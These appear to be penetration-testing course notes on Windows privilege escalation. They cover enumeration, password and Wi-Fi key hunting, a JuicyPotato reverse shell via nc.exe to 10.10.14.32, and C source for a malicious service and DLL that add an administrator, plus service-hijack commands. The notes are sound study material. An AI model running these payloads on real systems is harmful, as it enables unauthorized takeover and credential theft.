Windows privilege escalation

Last updated on Apr 28, 2024

Notes for privilege escalation on Windows. Some of these notes are based on the Windows Privilege Escalation for Beginners course by TCM Academy, which is part of the Practical Network Penetration Tester (PNPT) certification.

Other resources

Fuzzy security guide: https://fuzzysecurity.com/tutorials/16.html
PayloadAllThethings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md
Sushant 747's guide: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

Enumeration

System enumeration
Operating system

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Patches/Hotfix

wmic qfe get Caption,Description,HotFixID,InstalledOn

Disks

wmic logical get caption,description,providername

User enumeration
Users on the machine

net user

net user <user>

Groups on the machine

net localgroup

net localgroup <group>

Network enumeration
ARP table

arp -a

Connections/open ports

netstat -ano

Password hunting
Find password string on files

findstr /si password *.txt
findstr /si password *.ini
findstr /si password *.config

List Windows Vault passwords

cmdkey /list

Wifi passwords
Find SSID

netsh wlan show profile

Show password

netsh wlan show profile <SSID> key=clear

Command history

history

AV enumeration
Check Windows Defender

sc query WindDefend

Check firewall (modern)

netsh advfirewall firewall dump

Check firewall (old)

netsh firewall show state

Windows subsystem for Linux

Find bash.exe binary:

\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_[...]\bash.exe

Token impersonation

Juicy potato

Find nc.exe on Kali

locate nc.exe

Reverse shell using nc.exe

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\nc.exe -e cmd.exe 10.10.14.32 443" -t *

Hidden information

Alternate data stream

Show hidden files

dir /r

Extract hidden files

expand file:hiddenfile output

Windows Registry

Autorun
Check if we have permits of the listed binaries in Autorun. If there's a file that we can edit, it can be abused to escalate privileges when it us run.

Check file permissions with AccessChk

accesschk64.exe -wvu "C:\Program Files\Program"

Always install elevated
If AlwaysInstallElevated is set to 1; we can execute .msi files as system.
Check if values are set to 1.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Service escalation

Unquoted service path
Look for services paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

regsvc
Check regsvc ACL

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

If Full control over registry key, a malicious executable can be used to escalate privileges
Malicious file to add user to administrators group

#include <windows.h>
#include <stdio.h>

#define SLEEP_TIME 5000

SERVICE_STATUS ServiceStatus; 
SERVICE_STATUS_HANDLE hStatus; 
 
void ServiceMain(int argc, char** argv); 
void ControlHandler(DWORD request); 

//add the payload here
int Run() 
{ 
    system("cmd.exe /k net localgroup administrators user /add");
    return 0; 
} 

int main() 
{ 
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
 
    StartServiceCtrlDispatcher(ServiceTable);  
    return 0;
}

void ServiceMain(int argc, char** argv) 
{ 
    ServiceStatus.dwServiceType        = SERVICE_WIN32; 
    ServiceStatus.dwCurrentState       = SERVICE_START_PENDING; 
    ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode      = 0; 
    ServiceStatus.dwServiceSpecificExitCode = 0; 
    ServiceStatus.dwCheckPoint         = 0; 
    ServiceStatus.dwWaitHint           = 0; 
 
    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler); 
    Run(); 
    
    ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
    SetServiceStatus (hStatus, &ServiceStatus);
 
    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
		Sleep(SLEEP_TIME);
    }
    return; 
}

void ControlHandler(DWORD request) 
{ 
    switch(request) 
    { 
        case SERVICE_CONTROL_STOP: 
			ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
 
        case SERVICE_CONTROL_SHUTDOWN: 
            ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
        
        default:
            break;
    } 
    SetServiceStatus (hStatus,  &ServiceStatus);
    return; 
}

Compile file:

x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Add file to ImagePath of regsvc:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

Start service to execute file:

sc start regsvc

File executable
If we have write privileges over an executable file that is run as administrator, we can replace the executable to escalate privileges.

Check file permissions:

C:\Users\User\accesschk64.exe -wvu "C:\Program Files\Service"

File startup
If we have write permissions over the startup programs folder, we can add an malicious file to escalate privileges.

Check folder/file permissions:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

DLL hijacking
If a .dll file of a service is not found o we have write permissions over it, we can add a malicious file to escalate privileges.

Malicious file (Change command you want to execute):

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net localgroup administrators user /add");
        ExitProcess(0);
    }
    return TRUE;
}

After changing the file just restart the service that loads this dll.

binPath
If we can edit the binary path of a service, we can choose a malicious file or execute a command.

Find services with writes permissions for everyone

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc Everyone *

Check service permissions with accesschk:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc <service>

Change binpath for a command that adds a user to the administrators group:

sc config <service> binpath="net localgroup administrators <user>"